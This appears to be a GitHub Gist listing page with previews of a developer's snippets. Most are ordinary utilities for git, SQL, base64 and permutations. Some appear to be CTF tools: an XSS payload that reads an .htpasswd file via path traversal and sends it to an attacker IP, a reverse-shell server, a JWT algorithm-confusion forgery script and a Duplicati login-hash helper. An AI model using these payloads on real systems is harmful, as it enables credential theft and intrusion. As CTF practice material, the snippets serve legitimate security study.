Jeff Tong Wind010
Wind010
/ git_filter_repo.ps1
Last active
December 7, 2024 02:00
Remove files from git history on owned git repo. Does not rid that file history from pull requests.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| pip install git-filter-repo | |
| $filesToDelete = @("some.txt", "other.txt") | |
| $excludeFolders = @("template") | |
| Get-ChildItem -Path . -Recurse -File | Where-Object { | |
| $filesToDelete.Contains($_.Name) -and | |
| -not $excludeFolders.Contains($_.Directory.Name) | |
| } | % { git filter-repo --path $_.FullName --invert-paths --Force } |
Wind010
/ a_foothold.sh
Created
November 25, 2024 04:11
Script to automate gaining foothold information. Can be updated to enumerate via Local File Inclusion.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| cat <<EOF > exploit.md | |
| <script> | |
| fetch("http://xxxxx.htb/messages.php?file=../../../../var/www/statistics.xxxxx.htb/.htpasswd") | |
| .then(response => response.text()) | |
| .then(data => { | |
| fetch("http://10.10.xx.xx:8000/?data=" + btoa(data)); | |
| }) | |
| .catch(error => console.error("Error fetching the messages:", error)); | |
| </script> | |
| EOF |
Wind010
/ generate_nonced_password.js
Created
August 26, 2024 20:23
Just some easier code for Duplicati Login with known NONCE and Salted Password.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| const base64Decode = str => Uint8Array.from(atob(str), c => c.charCodeAt(0)); | |
| const base64Encode = bytes => btoa(String.fromCharCode(...new Uint8Array(bytes))); | |
| const generatePassword = async (nounce, saltedPassword) => { | |
| const bytesNounce = base64Decode(nounce); | |
| const bytesSaltedPassword = base64Decode(saltedPassword); | |
| const concatenatedBytes = new Uint8Array([...bytesNounce, ...bytesSaltedPassword]); | |
| const hash = await crypto.subtle.digest('SHA-256', concatenatedBytes); | |
| return base64Encode(hash); | |
| }; |
Wind010
/ post_server.py
Last active
August 20, 2024 03:39
Reverse shell hosted by http.server for CTF
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| import argparse | |
| import http.server | |
| import socketserver | |
| import socket | |
| import os | |
| import pty | |
| class CustomRequestHandler(http.server.SimpleHTTPRequestHandler): |
Wind010
/ permutations.py
Created
August 5, 2024 23:13
Create permutations of a list of objects up to n selected combined elements.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import itertools | |
| n = 3 | |
| names = [ | |
| "Jordan", "Haig", "Emily", "Johns", "Elisa", "Maldonado", "Brandi", "Simmons", "Gerard", "Sekawa", "Shelly", "Buckle", "Alice", "Apple", "Maxis", "Stewart", "Olivia", "Johnson", "Ava", "Brown", "Sophia", "Taylor", "Amelia", "Davis", "Evelyn", "Rodriguez", "Emma", "Smith", "Charlotte", "Jones", "Mia", "Miller", "Harper", "Garcia", "Abigail", "Martinez" | |
| ] | |
| permutations = [''.join(p) for p in itertools.product(names, repeat=n)] | |
| [print(perm) for perm in permutations] |
Wind010
/ generateJwtWithPublicKey.py
Created
August 5, 2024 02:53
Forge a JWT with a RS256 public key to take advantage of CVE-2016-5431/CVE-2016-10555.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from codecs import encode, decode | |
| import hashlib | |
| import hmac | |
| import json | |
| # https://github.com/FlorianPicca/JWT-Key-Recovery | |
| with open('pub.pem', 'rb') as f: | |
| key = f.read() | |
| header = b'{"typ":"JWT","alg":"HS256"}' |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # If you come from bash you might have to change your $PATH. | |
| # export PATH=$HOME/bin:/usr/local/bin:$PATH | |
| # Path to your oh-my-zsh installation. | |
| export ZSH="$HOME/.oh-my-zsh" | |
| # Set name of the theme to load --- if set to "random", it will | |
| # load a random theme each time oh-my-zsh is loaded, in which case, | |
| # to know which specific one was loaded, run: echo $RANDOM_THEME | |
| # See https://github.com/ohmyzsh/ohmyzsh/wiki/Themes |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| param( | |
| [Parameter(Mandatory=$true)] | |
| [string]$KeyVaultName, | |
| [Parameter(Mandatory=$true)] | |
| [string]$SubscriptionName | |
| ) | |
| az account set -s "$SubscriptionName" |
Wind010
/ base64_urlsafe.py
Last active
May 24, 2024 03:10
Just base 64 encoding and decoding with URL safe call with hex string output.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import base64 | |
| def base64_decode(encoded_str, url_safe=True): | |
| hexadecimal_hash = '' | |
| padding = 4 - (len(encoded_str) % 4) | |
| if padding and padding != 4: # Padding can be 1, 2, or 3 | |
| encoded_str += '=' * padding | |
| print(encoded_str) | |
| if url_safe: |
Wind010
/ batch_delete.sql
Last active
April 20, 2024 20:13
SQL to batch delete specific rows wrapped wrapped in transaction.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| SQL to batch delete specific rows wrapped wrapped in transaction. | |
| */ | |
| DECLARE @BatchSize INT = 1000; | |
| DECLARE @RowsAffected INT = 1; | |
| DECLARE @Batches INT = 10; | |
| DECLARE @BatchCount INT = 0; | |
| WHILE @RowsAffected > 0 AND @BatchCount < @Batches |